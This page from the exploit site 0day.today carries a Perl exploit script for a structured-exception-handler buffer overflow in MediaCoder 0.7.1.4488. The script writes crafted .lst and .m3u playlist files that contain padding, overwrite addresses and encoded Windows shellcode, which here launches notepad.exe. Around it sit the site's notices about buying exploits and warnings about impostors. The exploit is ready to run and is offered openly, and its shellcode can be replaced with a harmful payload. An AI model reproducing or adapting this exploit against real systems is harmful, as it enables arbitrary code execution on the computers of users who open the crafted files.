0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
MediaCoder 0.7.1.4488 (.lst & .m3u) Universal Buffer Overflow (SEH)
=================================================================== MediaCoder 0.7.1.4488 (.lst & .m3u) Universal Buffer Overflow (SEH) =================================================================== #!/usr/bin/perl #[+] software : MediaCoder 0.7.1.4488 (.lst & .m3u) Universal Buffer overflow (SEH) #[+] Author : opt!x hacker #[+] greetz to germaya_x because he finds an exploit in MediaCoder 0.7.1.4486 #[+] download :http://www.mediacoderhq.com/dlfull.htm #[+] tested under: SP2 (FR) ########################################################## # windows/exec - 153 bytes # Encoder: x86/jmp_call_additive # EXITFUNC=seh, CMD=notepad.exe my $shellcode= "\xfc\xeb\x11\x5e\xbf\x5c\xae\xcd\xea\x56\x31\x3e\xad\x01" . "\xc7\x85\xc0\x75\xf7\xc3\xe8\xea\xff\xff\xff\xa0\x46\x89" . "\xea\x58\x97\x99\xae\x64\x1c\xe1\x35\xec\x23\xf5\xbd\x43" . "\x3c\x82\x9d\x7b\x3d\x7f\x68\xf0\x09\xf4\x6a\xe8\x43\xca" . "\xf4\x58\x27\x0a\x72\xa7\xe9\x41\x76\xa6\x2b\xbe\x7d\x93" . "\xff\x65\x7a\x96\x1a\xee\xdd\x7c\xe4\x1a\x87\xf7\xea\x97" . "\xc3\x58\xef\x26\x3f\xed\x13\xa2\xbe\x1a\xa2\xe8\xe4\xd8" . "\x76\x4f\xd4\x16\x18\x26\x72\x5d\x9f\xf6\xf1\x21\x2c\x7c" . "\x75\xbd\x81\x09\x1e\xb5\x50\xf5\x5c\x05\x08\x56\x0b\x75" . "\x47\x52\x94\x1d\xc0\xa5\xa0\xd3\xa7\xa6\x52\x85\x28\x2d" . "\xf8\x29\xd6\xa9\x2c\xac\x60\x57\x31\x2e\x91\x97\x31"; my $junk="\x41" x 775; my $next_seh1="\x10\x00\xF3\xA2"; # call esp in mcres.dll = 0x1000F3A2 my $seh="\x31\x66\x66\x31"; # pop pop ret->mediacoder.exe open(myfile,'>>mediacoder.lst'); print myfile $junk.$next_seh1.$seh.$shellcode; my $next_seh2="\x87\x51\x37\x00"; # jmp esp in sdl.dll open(myfile,'>>mediacoder.m3u'); print myfile $junk.$next_seh2.$seh.$shellcode; # 0day.today [2024-12-26] #